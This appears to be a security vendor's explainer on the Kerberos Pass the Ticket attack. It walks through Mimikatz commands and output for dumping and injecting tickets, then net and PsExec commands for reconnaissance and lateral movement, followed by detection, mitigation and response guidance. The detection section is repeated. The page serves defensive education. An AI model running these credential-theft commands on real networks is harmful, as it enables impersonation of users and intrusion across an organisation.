Pass the Ticket Attack

Active Directory
Credential Theft
Defense Evasion
Kerberos
Lateral Movement

Pass the Ticket is a credential theft technique that enables adversaries to use stolen Kerberos tickets to authenticate to resources (e.g., file shares and other computers) as a user without having to compromise that user’s password. Adversaries often use this technique to move laterally through an organization’s network to hunt for opportunities to escalate their privileges or fulfill their mission. 

Both ticket-granting service (TGS) tickets and ticket-granting tickets (TGT) can be stolen and reused by adversaries. Without administrative privileges, an adversary can obtain the TGT (using “fake delegation”) and all TGS tickets for the current user. With administrative privileges, an adversary can dump the LSASS process and obtain all TGTs and TGS tickets cached on the system.

Threat Summary
Target:
Active Directory
Tools:
ATT&CK® Tactic:
ATT&CK Technique:
Difficulty
Detection:
Medium
Mitigation:
Hard
Response:
Medium

Attack Tutorial: How Pass the Ticket Attacks Work

STEP 1

Steal a user’s ticket

An adversary uses a tool like Mimikatz to extract Kerberos tickets from the memory of the LSASS.exe process:
########
# To capture TGTs, this invocation of mimikatz must be run from an elevated shell.
########
PS> mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"
########
# mimikatz outputs all tickets to screen and also writes them individually to files
# in the current directory. We have truncated the output to show a single session.
#########
Authentication Id : 0 ; 31770591 (00000000:01e4c7df)
Session           : RemoteInteractive from 4
User Name         : joed
Domain            : DOMAIN
Logon Server      : DC1
Logon Time        : 03/07/2020 08:07:58
SID               : S-1-5-21-3501040295-3816137123-30697657-1109
 
         * Username : joed
         * Domain   : DOMAIN.COM
         * Password : (null)
 
        Group 0 - Ticket Granting Service
         [00000000]
           Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
           Service Name (03) : host ; host.domain.com ; @ DOMAIN.COM
           Target Name  (03) : host ; host.domain.com ; @ DOMAIN.COM
           Client Name  (01) : joed ; @ DOMAIN.COM ( DOMAIN.COM )
           Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             516bedd608a71be859f1c0fa450708d915cd7e3bd99df793057ac110debfa98e
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1e4c7df]-0-0-40a10000-joed@host-host.domain.com.kirbi !

        Group 1 - Client Ticket ?
 
        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
           Service Name (02) : krbtgt ; DOMAIN.COM ; @ DOMAIN.COM
           Target Name  (02) : krbtgt ; DOMAIN ; @ DOMAIN.COM
           Client Name  (01) : joed ; @ DOMAIN.COM ( DOMAIN )
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             34911deb40f5b400cfd9d8234b36dfdf2064b27bfabccdd65f077ed90918d85d
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi !
PS>
STEP 2

Reuse the ticket

Next, the threat actor uses mimikatz.exe kerberos::ptt or a tool with similar capabilities to inject the stolen TGT into their own session, causing their session to adopt the identity and privileges of the stolen TGT for subsequent authentications to resources:
PS> mimikatz.exe "kerberos::ptt C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi"
 
* File: 'C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi': OK
PS>
# The following command can be used to verify that the right ticket was successfully injected
PS> mimikatz.exe "kerberos::list"
[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
   Server Name       : krbtgt/DOMAIN.COM @ DOMAIN.COM
   Client Name       : joed @ DOMAIN.COM
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
PS> 
STEP 3

Conduct internal reconnaissance

Once a stolen ticket is ready for reuse, the threat actor needs to determine where it can be used:

A stolen TGS can be used to access only the resource it was issued for, and an adversary can determine that information by inspecting the TGS itself.

To use a stolen TGT, however, the attacker may need to conduct internal reconnaissance to determine what access it provides. This may be as straightforward as querying the user’s group memberships and looking for obvious indicators. Many tools exist to enumerate Active Directory, but an adversary can also use built-in commands like net to discover these details:
PS> net user joed /domain
The request will be processed at a domain controller for domain domain.com.
 
User name                    joed
Full Name                    Joe Dibley
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
 
Password last set            ‎6/‎15/‎2020 3:42:00 PM
Password expires             Never
Password changeable          ‎6/‎16/‎2020 3:42:00 PM
Password required            Yes
User may change password     Yes
 
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   ‎7/‎9/‎2020 6:26:56 PM
 
Logon hours allowed          All
 
Local Group Memberships
Global Group memberships     *Workstation Administrators *VPNUser
                             *FileServer1_PublicShare *Domain Users
The command completed successfully.
PS> 
STEP 4

Access resources as the user

Finally, the threat actor can use lateral movement techniques to attempt to access other resources and further their objectives:
PS> .\PsExec.exe \\workstation456 powershell.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS> hostname
workstation456
PS>

Detect, Mitigate and Respond

Detect
Mitigate
Respond
Difficulty: Medium
Endpoints and Active Directory are both sources of signals indicating active use of Pass the Ticket attacks.

Detection on endpoints

Options include the following:

  • Detect the hooking of LSASS.exe for retrieving or injecting Kerberos tickets. Many endpoint detection and response solutions are capable of this.
  • Analyze logged-on sessions for a username mismatch between the logged-on user and its Kerberos tickets. We’ve created a proof-of-concept for this detection, written in PowerShell.

Detection in Active Directory

Collect and correlate Kerberos events, as follows:

  1. Develop a ledger that records when and on which endpoint each ticket granting ticket (TGT) was issued. To do so, audit the following events:
    • ‘A Kerberos Authentication Ticket (TGT) was requested’ (Event ID 4768)
    • ‘A Kerberos Service Ticket was renewed’ (Event ID 4770)
  2. Compare each request for a ticket-granting service (TGS) against the ledger to determine that the requesting endpoint is the same as the endpoint the TGT was issued to. To do so, audit the following events:
Note that the volume of these events in all but the smallest environments is substantial, which makes manual analysis impractical. As a result, real-time, machine-driven detection is preferred.
It is not possible to detect the theft and use of a single TGS in Active Directory.
Difficulty: Hard
The best mitigation tactics focus on making tickets harder to steal and limiting what a threat actor can do with a stolen ticket:
  • Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and permit only trusted processes to access them.
  • Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces the risk that an adversary can use a stolen ticket for lateral movement.
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can use a stolen ticket to escalate their privileges.
Difficulty: Medium
Options for responding to a detected use of Pass the Ticket include the following:
  • Reset the password of the compromised user account, and optionally disable the user to a) force instantaneous replication to all domain controllers, and b) prevent further use of the compromised ticket.
  • Reset the password for all users who have logged on to an impacted machine.
  • Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities.
  • Activate the incident response process and alert the response team.

Detect
Difficulty: Medium
Endpoints and Active Directory are both sources of signals indicating active use of Pass the Ticket attacks.

Detection on endpoints

Options include the following:

  • Detect the hooking of LSASS.exe for retrieving or injecting Kerberos tickets. Many endpoint detection and response solutions are capable of this.
  • Analyze logged-on sessions for a username mismatch between the logged-on user and its Kerberos tickets. We’ve created a proof-of-concept for this detection, written in PowerShell.

Detection in Active Directory

Collect and correlate Kerberos events, as follows:

  1. Develop a ledger that records when and on which endpoint each ticket granting ticket (TGT) was issued. To do so, audit the following events:
    • ‘A Kerberos Authentication Ticket (TGT) was requested’ (Event ID 4768)
    • ‘A Kerberos Service Ticket was renewed’ (Event ID 4770)
  2. Compare each request for a ticket-granting service (TGS) against the ledger to determine that the requesting endpoint is the same as the endpoint the TGT was issued to. To do so, audit the following events:
Note that the volume of these events in all but the smallest environments is substantial, which makes manual analysis impractical. As a result, real-time, machine-driven detection is preferred.
It is not possible to detect the theft and use of a single TGS in Active Directory.
Mitigate
Difficulty: Hard
The best mitigation tactics focus on making tickets harder to steal and limiting what a threat actor can do with a stolen ticket:
  • Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and permit only trusted processes to access them.
  • Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces the risk that an adversary can use a stolen ticket for lateral movement.
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can use a stolen ticket to escalate their privileges.
Respond
Difficulty: Medium
Options for responding to a detected use of Pass the Ticket include the following:
  • Reset the password of the compromised user account, and optionally disable the user to a) force instantaneous replication to all domain controllers, and b) prevent further use of the compromised ticket.
  • Reset the password for all users who have logged on to an impacted machine.
  • Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities.
  • Activate the incident response process and alert the response team.

MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.